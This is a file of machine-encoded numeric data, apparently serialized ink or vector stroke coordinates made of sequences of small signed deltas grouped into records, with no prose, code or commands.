0 0,-1 1-1,1-1 1,0 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 1-1,-1-1 1,1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 1 0,-8-14-5976,8 2 2778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8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1 404,'0'0'3098,"-20"12"10097,39-9-13397,-16-1-870,0-1 1,0-1 0,0 1 0,1 0-1,-1-1 1,0 0 0,1 1-1,-1-1 1,0-1 0,1 1-1,4-1 1,3 0-1892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19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78 552,'11'-1'7939,"-11"17"-7065,1-10-658,-1-1 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 1 0,0-1 0,0 0 0,-1 0 0,-2 7 0,-3 19 602,7-28-717,0 1 0,0-1 0,-1 1 0,1-1 0,-1 1 0,0-1 0,0 0 1,-3 5-1,-6 22 1260,10-30-1338,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,1 1-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 1 1,0-1-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 1 1,10-20 417,42-54-291,-44 60-114,0 0 0,0 1-1,1 0 1,1 0 0,0 1 0,1 0 0,0 1 0,1 1 0,0-1 0,0 2-1,1 0 1,0 0 0,0 1 0,17-6 0,-29 12-33,1 0 0,0 1 0,0-1 0,0 0 0,-1 1-1,1 0 1,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0-1,0 1 1,0 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1-1,1 0 1,-1 1 0,0-1 0,0 1 0,1-1 0,0 4 0,0 1 2,0 1 0,0 0 0,-1 0 0,0 1 0,-1-1 0,1 0 0,-2 10 0,1-6 2,-2 0-10,0 0 0,0-1 0,-1 0 0,0 1 0,-1-1 0,0 0 0,-7 11 0,1 0-12,-10 35-716,16-16-6155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55 1008,'5'-17'3771,"-5"16"-3666,1 1 0,-1 0 0,0-1 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,-1-1 0,-3-8 1595,4 9-1617,0-1 1,0 1 0,0 0-1,0-1 1,0 1 0,0-1-1,0 1 1,0 0 0,0-1-1,0 1 1,-1 0 0,1-1-1,0 1 1,0 0 0,0-1-1,-1 1 1,1 0 0,0-1-1,0 1 1,-1 0 0,1 0-1,0-1 1,-1 1-1,1 0 1,0 0 0,-1 0-1,1-1 1,0 1 0,-1 0-1,1 0 1,0 0 0,-1 0-1,1 0 1,-1 0 0,1 0-1,0 0 1,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0-1,-7 0 732,-25 5 1155,1 6-1356,0 2 1,1 1-1,-36 22 1,64-34-577,1 0 1,-1 0-1,0 0 0,1 1 1,-1-1-1,1 1 0,0-1 1,0 1-1,0 0 1,0 0-1,1 0 0,-1 0 1,-1 5-1,-3 9 32,5-17-69,0 1 0,1 0 1,-1 0-1,1 0 1,-1 0-1,1-1 0,-1 1 1,1 0-1,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,1 0-1,-1 0 1,0 0-1,1 0 0,0 2 1,1 0-2,0 0 0,1 1 0,-1-1 1,1 0-1,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,1-1 0,-1 0 0,1 0 1,0 0-1,-1-1 0,1 1 0,0-1 0,0 0 1,0 0-1,8 1 0,3-1-54,1-1-1,0 0 1,0-1-1,16-4 1,35-1-2096,-63 6 1294,0-1 0,0 1 0,0-1 0,-1 0 1,1 0-1,0-1 0,-1 1 0,6-3 1,8-3-3892,3 1 1436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0 596,'-10'15'8092,"5"-9"-7691,-1 0-1,1 1 1,1-1-1,-1 1 1,1 0-1,0 0 1,1 1-1,-5 13 0,-3 11 1215,10-27-1453,1 0 0,-1 0-1,-1-1 1,1 1 0,-1 0-1,1-1 1,-1 0 0,-4 7-1,3-7-79,1 0-1,0 1 0,0-1 0,0 1 0,1 0 0,0-1 0,-1 1 1,1 7-1,-10 38 342,10-46-452,1-1 1,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,1 1-1,0-1 1,0 1 0,-1-1 0,2 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,1-1 0,-1 0 0,1 1 0,0-1 0,-1 0 0,5 0 0,-4-1-468,-1 0 0,0 0 1,1-1-1,-1 1 0,0-1 0,0 0 1,1 0-1,-1 0 0,0 0 0,0-1 1,0 1-1,0-1 0,4-3 1,7-2-2688,-1 1 109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2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1720,'2'6'8176,"1"-1"-4210,-1-4-4106,0 0 1,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0-1-1,0 1 1,0-1 0,0 0 0,3 0 0,-3 0-1369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36 368,'-9'-6'16094,"10"6"-16069,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 1,0 0-1,0-1 0,0 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 1,0 0-1,1-2 0,-1-4 383,-1 24-121,-10 7-167,0 55 112,-10-13-117,20-62-110,1-1 1,-1 0-1,1 0 0,-1 0 1,0 1-1,0-1 0,-1 0 1,-2 5-1,3-5 5,-1 0 1,1 0-1,-1 0 0,1 0 0,0 0 1,0 0-1,1 1 0,-2 5 1,2-7-3,0 0 1,0 0-1,-1 0 0,1 0 1,-1 0-1,1 0 1,-1-1-1,0 1 1,1 0-1,-1 0 1,0-1-1,0 1 0,-3 3 1,3-4-2,0 0-1,0 1 1,0-1 0,0 1-1,0 0 1,0-1 0,1 1-1,-1 0 1,0-1 0,1 1 0,0 0-1,-1 0 1,1 3 0,-11 18 128,11-22-54,-11 24-275,0 17 142,10-35-3685,-3-15-249,-1-22-3861,5 18 4833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50 228,'2'-18'4016,"4"7"-3005,-6 10-923,0 1-1,1-1 1,-1 0 0,0 1 0,0-1-1,1 0 1,-1 1 0,1-1-1,-1 0 1,0 1 0,1-1 0,-1 0-1,1 1 1,0-1 0,-1 1 0,1-1-1,-1 1 1,1 0 0,0-1-1,3 0 3696,40 0-1708,-39-1-2049,1 1-1,0-1 1,0 1-1,0 1 1,0-1-1,0 1 1,0 0 0,0 1-1,0-1 1,0 1-1,0 0 1,0 1-1,0-1 1,-1 1-1,1 0 1,0 1-1,-1-1 1,0 1 0,0 0-1,0 0 1,6 5-1,-10-6-25,16 22 150,-16-22-143,-1-1 0,0 0 0,0 0 1,0 0-1,1 0 0,-1 1 0,-1-1 0,1 0 0,0 0 1,0 0-1,0 0 0,0 1 0,-1-1 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 0,0 0 0,-1 1 1,-5 6 206,0 0 0,-1-1 0,0 0 0,0 0 0,-1-1 0,0 1 0,0-2 1,-1 0-1,1 0 0,-1 0 0,0-2 0,-1 1 0,-14 3 0,16-6-166,-1 0-1,0 0 0,1-1 1,-12-1-1,-6 0 15,23 1-132,0 1 0,1-1 1,-1 1-1,0 0 0,1 1 1,-1-1-1,1 1 0,-1-1 0,1 1 1,-7 5-1,2-2-1437,6-4 155,9 2-2405,8-12-4647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6 804,'0'0'1571,"-12"-1"3499,10 1-4990,1 1 0,0-1 0,0 1 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 1 0,0 1 0,-11 28 343,11-21-383,0-8-34,-1 1 0,1 0-1,0-1 1,0 1 0,0 0 0,1 0 0,-1-1-1,1 1 1,-1 0 0,1-1 0,0 1-1,0-1 1,0 1 0,3 4 0,2 9 30,-6-14-33,0-1 0,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 0,1 0 1,-1 1-1,1-1 1,-1 0-1,1 0 1,0 0-1,-1 0 0,1-1 1,0 1-1,0 1 1,3 0-2,-1-1 1,1 0-1,-1 1 1,1-1 0,-1-1-1,1 1 1,0 0 0,0-1-1,-1 0 1,1 0-1,0 0 1,-1 0 0,1-1-1,0 1 1,0-1 0,-1 0-1,4-1 1,8-4 45,-1 0 1,25-14-1,-31 16-20,-8 4-24,1-1-1,0 1 1,0 0-1,0-1 1,0 1-1,-1 0 1,1-1-1,0 1 0,-1-1 1,1 1-1,0-1 1,-1 0-1,1 1 1,0-1-1,-1 1 0,1-1 1,-1 0-1,1 0 1,-1 1-1,0-1 1,1 0-1,-1 0 1,0 0-1,1 1 0,-1-1 1,0 0-1,0 0 1,0 0-1,0-1 1,11-25 803,-11 25-721,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 0,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,0 0 0,0 0 1,0 0-1,-2-2 1,-4-5 419,-11-7 734,12 13-1135,0 0 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,1 1 0,-1 0 0,-8 2-1,4-1-85,9-2-17,1 0 0,0 1 1,0-1-1,0 0 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 1 1,0 0-1,0-1 0,1 1 0,-1 0 0,-2 2 0,-3 4-176,-8 14 177,11 5-3248,3-25 2976,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,-1 1 0,1-1-1,0 1 1,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,1-1 0,3 2-3085,4-1 572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19 632,'-2'-12'2528,"0"11"-2001,2 1-422,0-1 0,-1 1-1,1 0 1,0-1-1,0 1 1,-1 0 0,1-1-1,0 1 1,-1 0-1,1-1 1,0 1 0,-1 0-1,1 0 1,0 0-1,-1-1 1,1 1 0,-1 0-1,1 0 1,0 0-1,-1 0 1,1-1 0,-1 1-1,1 0 1,-1 0-1,1 0 1,0 0 0,-1 0-1,1 0 1,-1 0-1,1 1 1,-1-1 0,1 0-1,0 0 1,-1 0-1,1 0 1,-1 0 0,1 1-1,0-1 1,-1 0-1,1 0 1,-1 1 0,1-1-1,0 0 1,0 0-1,-1 1 1,1-1 0,0 0-1,-1 1 1,-19 19 1740,18-14-1350,-1 1-1,1-1 1,1 1-1,-1 0 1,0 13-1,-9 41 188,0-19-681,8-22-64,2-20 55,1 1-1,0-1 1,0 1 0,-1-1-1,1 1 1,0-1-1,0 1 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1 0,0-1-1,0 1 1,0-1-1,1 1 1,-1-1-1,0 1 1,0-1-1,0 1 1,1-1-1,-1 1 1,0-1-1,1 2 1,10 14-2541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1 888,'0'0'156,"-1"0"1,1 0-1,-1 0 0,1 0 1,0 0-1,-1 0 0,1 0 0,0 0 1,-1 0-1,1 1 0,0-1 1,-1 0-1,1 0 0,0 0 0,-1 1 1,1-1-1,0 0 0,-1 0 1,1 1-1,0-1 0,0 0 0,-1 0 1,1 1-1,0-1 0,0 0 1,0 1-1,0-1 0,-1 0 0,1 1 1,0-1-1,0 1 0,0-1 1,0 0-1,0 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,0 0 0,0 1 0,0-1 1,0 0-1,0 1 0,1-1 1,-1 0-1,0 1 0,0-1 0,0 0 1,1 1-1,-1-1 0,0 1 1,17 28 92,-5-6 245,-10-19-486,0 0 1,0 0-1,0 0 0,1 0 1,0-1-1,0 1 0,0-1 1,0 0-1,1 1 1,-1-2-1,1 1 0,6 4 1,-9-7 1,30 15-997,-29-15 801,-1 1 0,0-1 0,0 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,1-1 0,9-5-2605,-2 2 1296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4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0 252,'0'0'5153,"-11"8"-2091,8-3-2731,1 0 1,-1 0 0,0 0-1,0 0 1,0-1 0,-1 1-1,1-1 1,-7 6-1,-10 14 727,-39 39 616,44-48-1486,-1 0 0,-13 20 0,-7 3 130,29-32-290,0 0 0,1 1 1,-1 0-1,-7 11 0,-15 13-568,28-30 282,22-21-5965,1-4 899,-12 7 2631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13 160,'0'-10'5954,"-2"8"-5816,-1 2 130,0 1-1,0-1 1,0 1-1,0 0 1,0 0 0,0 0-1,1 1 1,-1-1 0,0 1-1,1-1 1,-1 1-1,1 0 1,-5 4 0,-33 37 2171,28-29-2043,5-5-134,1 0 0,1-1 0,0 2-1,-5 9 1,6-9 15,-1-1 1,0 0-1,-1 0 0,-6 8 0,10-13-211,-1-1-1,1 1 1,0 0 0,0-1 0,1 1 0,-1 0 0,1 0 0,-1 0-1,1 0 1,0 7 0,-10 24 207,10-34-269,0 0-1,0 1 1,0-1-1,1 0 1,-1 0 0,0 0-1,1 1 1,-1-1-1,1 0 1,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 0 1,0 1 0,1-1-1,-1 0 1,0 1-1,1-1 1,-1 0-1,1 1 1,-1-1 0,1 0-1,0 0 1,-1 0-1,1 0 1,0 1-1,0-1 1,0 0 0,0-1-1,0 1 1,0 0-1,0 0 1,0 0-1,0 0 1,0-1 0,1 1-1,-1-1 1,0 1-1,0-1 1,1 1-1,1 0 1,2 0-11,0 1 0,1-1-1,-1 0 1,1-1 0,-1 1 0,0-1 0,1 0-1,-1-1 1,1 1 0,6-2 0,9-3-471,10-3-2306,-6-8-4948,-16 10 4811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69 688,'0'0'96,"0"1"1,0 0-1,0 0 0,-1 0 0,1 0 1,0 0-1,1 0 0,-1 0 0,0 0 1,0-1-1,0 1 0,0 0 0,1 0 1,-1 0-1,0 0 0,1 0 0,-1-1 1,1 1-1,-1 0 0,1 0 0,-1-1 0,1 1 1,-1 0-1,1-1 0,0 1 0,0 0 1,0 0-1,13 11 939,-13-10-1016,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0-1-1,0 1 1,1 0 0,-1-1 0,0 1 0,0 0-1,1-1 1,1 1 0,8 2 78,0 0 0,0-1 1,0-1-1,0 0 0,0 0 0,0-1 0,0-1 0,1 1 0,-1-2 0,0 0 1,0 0-1,-1-1 0,1 0 0,0-1 0,18-9 0,-28 13-67,0-1 0,0 1-1,0-1 1,-1 1 0,1-1-1,0 1 1,0-1 0,-1 1 0,1-1-1,0 1 1,-1-1 0,1 0-1,0 1 1,-1-1 0,1 0 0,-1 0-1,1 0 1,-1 1 0,0-1-1,1 0 1,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0-1,0 1 1,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,-1 0-1,1 0 1,0-1 0,-2-1 158,0 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 0,-1 0 0,1 0 1,-1 0-1,-5-4 0,0 2 185,1-1 0,-1 1 0,-1 0 0,1 1 0,0 0 0,-1 0 0,0 0 0,-16-1 0,-5 1 1,27 2-400,0 0 0,1 0 0,-1 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 1-1,-1-1 1,0 1 0,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 1 0,1-1 0,0 1 0,-4 3 0,3-2-541,-2 4-202,4 2-5744,1-4 3923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6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39 612,'-5'2'360,"1"0"-1,0 0 1,0 1 0,0 0 0,0-1-1,0 2 1,0-1 0,1 0-1,0 1 1,-1 0 0,1-1-1,1 1 1,-4 6 0,0 9-35,6-19-311,-1 1-1,1 0 1,-1 0-1,1 0 1,0-1-1,-1 1 1,1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,1 0 1,-1 0-1,0 0 1,0 0-1,1 0 1,-1 0 0,0-1-1,1 1 1,-1 0-1,1 0 1,-1 0-1,1-1 1,-1 1-1,1 0 1,1 1-1,10 13 158,-9-10-160,0-1-1,0 1 1,1-1 0,-1 0 0,1 0-1,0 0 1,0 0 0,1-1-1,-1 0 1,1 0 0,7 4 0,-8-6-9,-1-1 1,1 1 0,-1-1 0,1 0 0,-1 0 0,0 0-1,1 0 1,-1-1 0,1 0 0,-1 1 0,0-1-1,1-1 1,-1 1 0,0 0 0,0-1 0,0 1-1,0-1 1,0 0 0,0 0 0,0 0 0,-1 0 0,1-1-1,-1 1 1,4-5 0,8-5 15,-13 11-3,0 0 1,0-1 0,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,-1 0 0,1-1 0,0 1-1,-1-1 1,1 1 0,-1-1 0,0 1 0,1-3-1,4-13 132,-4 17-137,-1 0-1,0-1 0,0 1 1,1-1-1,-1 1 1,0-1-1,0 1 1,1-1-1,-1 1 0,0-1 1,0 0-1,0 1 1,0-1-1,0 1 1,0-1-1,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 1 1,0-1-1,-1 1 1,1-1-1,0 1 0,0-1 1,-1 1-1,1-1 1,0 1-1,-1-1 1,1 1-1,0-1 1,-1 1-1,1 0 0,0-1 1,-1 1-1,0-1 1,0 0 24,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 1-19,0 1-1,0-1 1,0 0 0,0 1-1,0-1 1,0 1 0,0-1-1,0 0 1,0 1-1,0-1 1,0 0 0,0 1-1,0-1 1,-1 0-1,1 1 1,0-1 0,0 1-1,-1-1 1,1 0 0,0 1-1,-1-1 1,1 1-1,-1-1 1,1 1 0,-1 0-1,1-1 1,-1 1 0,0-1-1,-2-11 472,1 11-379,1 0-1,0 1 0,-1-1 1,1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0-1 1,0 1-1,1 0 1,-1-1-1,0 1 1,1 0-1,-1-1 0,1 1 1,-1 0-1,1-3 1,-1 3-5,0 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 1,1 0-1,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 1,-1-1-1,0 1 0,1 0 0,-4-1 0,2-3 185,0 1-241,-25 16 109,-21 19 31,47-30-152,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,1 0 0,-1 4 0,-4 8 64,5-15-97,-1 1 0,1-1 1,0 0-1,0 1 0,-1-1 0,1 0 1,0 1-1,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,-1 0 1,1 1-1,0-1 0,0 1 0,0-1 1,0 1-1,1-1 0,-1 0 0,0 1 1,0-1-1,0 1 0,0-1 0,0 0 1,0 1-1,1-1 0,-1 1 0,0-1 1,0 0-1,1 1 0,-1-1 1,0 0-1,1 1 0,-1-1 0,0 0 1,1 1-1,-1-1 0,1 0 0,8 12 24,-7-10-20,-1 0 1,0 0-1,0-1 0,1 1 0,-1 0 0,1-1 0,-1 0 1,1 1-1,0-1 0,-1 0 0,1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,0 0 0,0 0 0,4 0 0,10-1-1,0-1-1,-1 0 0,18-5 0,-18 3 15,0 1-1,1 0 1,16 1-1,-30 2-48,-1-1 23,-1 1 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,1 0 1,-1 1-1,0-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,0 0 0,-2 0-12,1 1-1,-1 0 1,0 0-1,1 0 1,-1 0 0,1 0-1,-1 1 1,1-1-1,0 0 1,0 1 0,0-1-1,1 1 1,-1-1 0,0 1-1,1-1 1,-1 5-1,-11 23-2755,1-11-4571,2-13 4991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7 392,'0'0'1995,"-13"-6"6144,12 6-8040,-1 0 0,1 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 0,-1 1 1,1-1-1,0 1 0,0-1 0,0 1 0,-1-1 1,1 1-1,0-1 0,0 1 0,0 0 1,0 0-1,0 0 0,0 0 0,0-1 0,1 1 1,-1 0-1,0 1 0,0-1 0,1 0 1,-2 2-1,-17 21-45,17-22 0,1-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 1,1 1-1,-1 0 0,0-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,-1 0 0,1 0 0,0 2 0,11 55-63,-11-57 11,0 1 0,0-1 0,1 0 0,-1 0 0,1 0 0,-1 0 1,1 1-1,0-1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 1 1,0-1-1,-1 1 0,1-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 1,4 0-1,5 1 4,1 0 0,-1-1 1,1 0-1,15-1 0,-17 0 13,-8 0-18,1 0 0,-1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0-1-1,-1 1 1,1 0 0,-1-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0-2 0,2-3 3,-1-1 0,-1 1 0,1-1 0,-1 1 0,0-1 1,-1-9-1,0 15 17,-1 0 0,1 1 0,0-1 0,-1 1 0,0-1 0,1 0 0,-1 1 1,0-1-1,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1 0 0,-3-1 0,0 0 120,1 1 0,-1-1 0,0 1 1,0-1-1,1 1 0,-1 0 0,0 1 0,-8-2 0,-12 3-62,-1 0 0,1 2 0,-1 0-1,-27 9 1,50-12-106,1 0 0,0 1 1,0-1-1,0 1 0,0-1 1,0 1-1,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0 0 1,0 0-1,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 0,1 0 1,-1 0-1,1 1 0,0-1 0,-1 0 1,1 0-1,0 2 0,-10 19-2730,8-17 1582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3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31 1092,'2'-11'4257,"1"9"-4053,-3 2-94,1 0-1,-1 0 0,1 0 0,-1 0 1,0-1-1,1 1 0,-1 0 1,0 0-1,1-1 0,-1 1 1,0 0-1,0-1 0,1 1 1,-1 0-1,0-1 0,0 1 0,0 0 1,1-1-1,-1 1 0,0-1 1,0 1-1,0 0 0,0-1 1,0 1-1,0-1 0,0 1 0,0 0 1,0-1-1,0 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0-1-1,6-4 457,-11 5 143,4 0-208,-6 14 260,0 0 35,0 0-1,-1 0 1,-17 23-1,22-34-714,1 1 1,0-1-1,0 1 1,0 0-1,0 0 1,1 0-1,-1 0 0,1 0 1,0 0-1,0 0 1,0 6-1,-1 54 322,2-48-365,0 81 20,0-96-95,0 1 0,1-1 1,-1 0-1,0 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0 1,1 0-1,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 1,0 0-1,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,1 1 0,-1-1 1,0 1-1,0-1 0,0 1 0,1-1 0,-1 0 0,2 1 0,-2-1-202,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,0-1 1,0 1-1,0-1 0,0 1 1,0-1-1,0 1 0,0-1 1,1 0-1,-1 0-198,-1 0 0,1 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,0 0-1,0-1 1,0-1 0,0-3-2528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9 137 896,'0'0'1585,"-1"-29"2762,-1 28-4592,-4-3 2241,15 2 1376,-7-11-1380,16-6-1345,-17 17-643,1 0 0,-1 0-1,1-1 1,0 1 0,0 0 0,0 0 0,0 1 0,0-1 0,4-2 0,4-6 21,-9 8-24,0 0 0,0 1 0,0-1 0,1 0 0,-1 1 1,1-1-1,-1 1 0,1 0 0,0-1 0,0 1 0,-1 0 1,4-1-1,-3 1-5,0 0-1,5-3-4,-5 3 11,-1 0 0,1 0 1,0 1-1,0-1 0,0 1 1,0 0-1,0-1 0,0 1 1,0 0-1,0 0 0,0 0 0,3 1 1,14-3 1,-15 1 0,0 0-1,0 0 1,0 0-1,0 1 1,0 0-1,0 0 1,0 0 0,0 0-1,0 1 1,0 0-1,0-1 1,0 1-1,0 1 1,0-1-1,0 1 1,4 1-1,4 2 9,-11-5-10,1 0-1,-1 0 1,1 0-1,-1 1 1,0-1-1,1 0 1,-1 1-1,0-1 1,1 1-1,-1-1 1,0 1-1,0 0 1,1 0-1,-1-1 1,0 1-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 1 1,-1-1-1,1 0 1,0 0-1,-1 0 1,1 1-1,0-1 1,-1 0-1,0 1 1,1-1-1,-1 2 1,0-2 10,0 49 77,0-46-83,-1-1-1,0 1 1,0 0-1,0 0 1,0 0-1,-1-1 1,0 1-1,1-1 1,-1 1-1,-1-1 1,1 0-1,0 0 1,-1 0-1,1 0 1,-6 4-1,-35 37 182,22-23-203,18-16 14,-1-1-1,1 0 0,-1 0 1,-1 0-1,1 0 0,-8 4 1,11-7 11,0-1-5,0 1-1,-1 0 1,1 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0-1,0 0 1,1 0 0,-1 1-1,0-1 1,1 0 0,-1 0-1,1 1 1,-1-1 0,1 1-1,0-1 1,-1 0 0,1 1-1,0-1 1,0 1 0,0 2-1,35 21 86,-33-23-87,1 0 0,-1 0 0,1-1 1,0 1-1,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,4 0 0,-4 0-1,1 0 0,-1 0-1,1 0 1,-1 1-1,0-1 1,1 1-1,-1-1 1,0 1-1,0 0 1,4 4-1,12 8-7,-16-12 5,0-1 0,0 1-1,0 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,1 1 0,-1-1-1,0 1 1,2 3-1,1 7-6,-5-12 13,0 0 0,1-1-1,-1 1 1,0-1 0,0 1 0,1 0 0,-1-1-1,0 1 1,0 0 0,0-1 0,0 1 0,0-1-1,0 1 1,0 0 0,0-1 0,0 1 0,0 0-1,0-1 1,0 1 0,0 0 0,-1-1 0,1 1-1,0 0 1,0-1 0,-1 1 0,1-1 0,0 1-1,-1-1 1,1 1 0,-1-1 0,1 1 0,-1-1-1,1 1 1,-1-1 0,1 1 0,-1-1-1,1 0 1,-2 1 0,-5 6 80,0-1 0,0 1 0,-1-1 0,0-1 0,0 0 0,0 0-1,-1 0 1,1-1 0,-1 0 0,0-1 0,-1 0 0,1-1 0,-13 3 0,-27 0 437,15 0-1899,11-3-3762,32-10-201,-5 4 2782,5-2-175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4:50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33 560,'1'-1'245,"-1"1"1,0-1-1,0 1 0,0-1 1,0 0-1,1 1 0,-1-1 1,0 0-1,0 1 0,0-1 1,-1 1-1,1-1 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,-1 1 0,1-1 1,0 0-1,-1 1 0,1-1 1,0 1-1,-1-1 0,1 1 1,0 0-1,-1-1 0,1 1 1,-1-1-1,1 1 0,-1 0 1,1-1-1,-1 1 0,0-1 1,-1 1-183,-2-9 2948,4 9-2979,0 0-1,0 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 0-1,0 0 1,0 0 0,-1-1-1,1 1 1,0 0 0,0 0-1,0 0 1,0 0 0,0 0-1,0-1 1,0 1 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0-1 0,0 1-1,0 0 1,0 0 0,0 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 